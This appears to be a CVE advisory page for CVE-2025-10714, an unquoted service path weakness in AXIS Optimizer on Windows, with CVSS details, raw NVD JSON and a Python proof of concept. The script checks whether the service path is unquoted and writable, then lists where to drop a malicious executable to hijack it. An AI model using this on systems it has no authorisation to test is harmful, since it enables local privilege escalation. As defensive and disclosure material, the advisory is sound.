Security Vulnerability Report
CVE-2025-10714 CVSS 8.4 HIGH

CVE-2025-10714

Published: 2025-11-11 08:15:34
Last Modified: 2026-04-15 00:35:42

Description

AXIS Optimizer was vulnerable to an unquoted search path vulnerability, which could potentially lead to privilege escalation within Microsoft Windows operating system. This vulnerability can only be exploited if the attacker has access to the local Windows machine and sufficient access rights (administrator) to write data into the installation path of AXIS Optimizer.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

AXIS Optimizer < fixed version
AXIS Optimizer on Windows installations whose install path contains spaces

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10714 PoC - AXIS Optimizer Unquoted Service Path
# This PoC demonstrates how to identify unquoted service paths
# that could lead to privilege escalation
import os
import subprocess
import sys


def check_unquoted_paths():
    """Check for unquoted service paths that could be exploited"""
    target_service = "AxisOptimizer"  # Service name example

    # Query service configuration using sc command
    try:
        result = subprocess.run(
            ["sc", "qc", target_service],
            capture_output=True,
            text=True
        )

        # Parse BINARY_PATH_NAME from output
        for line in result.stdout.split('\n'):
            if 'BINARY_PATH_NAME' in line:
                path = line.split(':', 1)[1].strip()
                print(f"[+] Found service path: {path}")

                # Check if path contains spaces and is not quoted
                if ' ' in path and not path.startswith('"'):
                    print(f"[!] VULNERABLE: Unquoted path with spaces detected!")
                    print(f"[!] Path components: {path.split()}")

                    # Show potential injection points
                    parts = path.split()
                    for i, part in enumerate(parts[:-1]):  # Exclude filename
                        potential_path = ' '.join(parts[:i+1]) + '.exe'
                        print(f"[!] Potential injection point: {potential_path}")
                        if os.path.exists(os.path.dirname(potential_path)):
                            if os.access(os.path.dirname(potential_path), os.W_OK):
                                print(f"[!] WRITEABLE: Attacker can write to {os.path.dirname(potential_path)}")
    except Exception as e:
        print(f"[-] Error: {e}")


def exploit_creation():
    """Generate example malicious executable name for path hijacking"""
    # Example: If service path is C:\Program Files\Axis Optimizer\optimizer.exe
    # Attacker can place malicious C:\Program.exe or C:\Program Files\Axis.exe
    malicious_executables = [
        "C:\\Program.exe",
        "C:\\Program Files\\Axis.exe"
    ]

    print("\n[!] To exploit, create malicious executable at one of these locations:")
    for exe_path in malicious_executables:
        print(f" - {exe_path}")


if __name__ == "__main__":
    print("=== CVE-2025-10714 Unquoted Path Checker ===")
    check_unquoted_paths()
    exploit_creation()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10714", "sourceIdentifier": "[email protected]", "published": "2025-11-11T08:15:33.787", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "AXIS Optimizer was vulnerable to an unquoted search path vulnerability, which could potentially lead to privilege escalation within Microsoft Windows operating system. This vulnerability can only be exploited if the attacker has access to the local Windows machine and sufficient access rights (administrator) to write data into the installation path of AXIS Optimizer."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.axis.com/dam/public/a2/c7/8c/cve-2025-10714pdf-en-US-504221.pdf", "source": "[email protected]"}]}}